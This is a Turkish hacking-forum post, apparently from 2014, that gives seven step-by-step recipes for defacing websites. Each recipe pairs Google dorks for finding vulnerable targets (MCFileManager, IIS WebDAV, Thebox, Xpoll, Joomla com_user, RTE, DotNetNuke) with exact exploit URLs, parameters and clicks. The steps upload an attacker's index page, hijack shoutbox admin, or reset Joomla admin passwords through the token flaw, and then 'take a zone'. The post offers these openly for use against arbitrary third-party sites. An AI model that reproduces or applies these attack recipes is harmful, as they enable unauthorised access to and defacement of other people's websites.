THT DUYURU

chat
Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

takipci
Seçenekler

IIS , Token , Dotnuke ve birkaç basit upload açığı - & FoReVeR-02 &

FoReVeR02 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Mesajlar:
1.665
Konular:
358
Teşekkür (Etti):
361
Teşekkür (Aldı):
253
Ticaret:
(0) %
0
937
13-02-2014 10:02
#1
1 - [MCFileManager]

Dork

inurl:/tiny_mce/plugins/filemanager/


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri seçilir . URL'den " filemanager/ " den sonraki bölüm silinir . Karşımıza gelen sayfada " Simple Example " yazısının sağ tarafında [MCFileManager] butonu tıklanır . Username password isterse deneme yanılma yapılır . Çıkmazsa index upload edilir .

2 - ISS

Dork

intext:"404 Object Not Found"
Microsoft-IIS/5.0"Microsoft-IIS/* server at"
intitle:index.of"Microsoft-IIS/4.0"
intitle:index.of"Microsoft-IIS/5.0 server at"
intitle:"Welcome to IIS 4.0"
intitle:"Welcome to Windows 2000 Internet Services"


Yöntem

ISS açığı olan site belirlenir , " Bilgisayarım " açılır . Sağ click tıklanır , " Ag Konumu Ekle " tıklanır . İki kere " İleri " tıklanır . " İnternet ya da Ağ Adresi " bölümüne ISS açığı bulunan site yazılır . Bağlantı kurulur . Bağlantı klasörü açılır . İndex içine atılır .

3 - Thebox

Dork

inurl:thebox/thebox.php


Yöntem


Dork aratılır . Çıkan sonuçlardan sonu " /thebox/thebox.php/ " olan bir site seçilir . Site URL'sinin sonuna " /admin.php?act=write&username=hack&password=byqta&a " kodu eklenir . İstenirse direk edit atılır . Aksi halde " View Log " yanındaki " Click Here " butonu tıklanır . İçlerinden herhangi birinin karşısındaki " Edit Shout " tıklanır . İndex kodları yapıştırılır .

4 - Xpoll

Dork

xpoll veya inurl:xpoll/admin/images


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Sağ üst köşeden " Delete All İmages " butonu tıklanır . Sonra " Upload An İmage " tıklanır . İndex seçilir . Site URL'sinden " admin " ve " index.php " silinir . İndexe ulaşılır .

5 - Token

Dork

"Joomla Overview site:"
inurl:*quot;com_idoblog*quot;
inurl:"com_idoblog" siterg
inurl:index.php?viewarticle siterg


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Site URL'sine " /index.php?option=com_user&view=reset&layout=confir m " kodu yazılır . Token kısmına " ' " yazılır ve " Submit " tıklanır . Password yenileme sayfasına iki yeni password yazılır , password sıfırlanır . Joomla açığı olduğu için panel sabittir , URL sonuna " /administrator " eklenir . Username tahmin işidir . Password ne yazdıysanız odur . Joomla paneline giriş yapılır .

6 - RTE

Dork

inurl:rte/my_********s/my_files/
inurl:/my_********s/my_files/


Yöntem

Dorklar aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitlerin URL'leri " /RTE " yazan yere silinir . Silindikten sonra URL'ye " /rte/RTE_popup_file_atch.asp " kodu yazılır . Çıkan ekrandan index upload edilir . Sağ bölmede gelen URL açılır , zone alınır .

7 - Dotnuke


Dork

inurl:/tabid/36/language/en-US/Default.aspx


Yöntem

Dork aratılır . Çıkan sonuçlardan herhangi biri açılır . Açılan sitelerin URL'lerine " /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx " kodu eklenir , enter tıklanır . Gelen sonuçta üç kutucuktan en alttaki seçilir , sayfa yenilendikten sonra arama çubuğundaki her şey silinir , çubuğa " ************:__doPostBack('ctlURL$cmdUpload','' ) " kodu yazılır . Gelen sayfada .txt olarak index upload edilir . Site URL'sinin sonuna " /Portals/0/index.txt " / " /Portals/1/.txt " kodu eklenir , zone alınır .

--------------------- Sonsuza dek ve daima...





Do You need help?
then it is the right place
& FoReVeR-02 &
Forensic Expert (Data Recovery) and Web Programmer
Sanayeryokburada Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler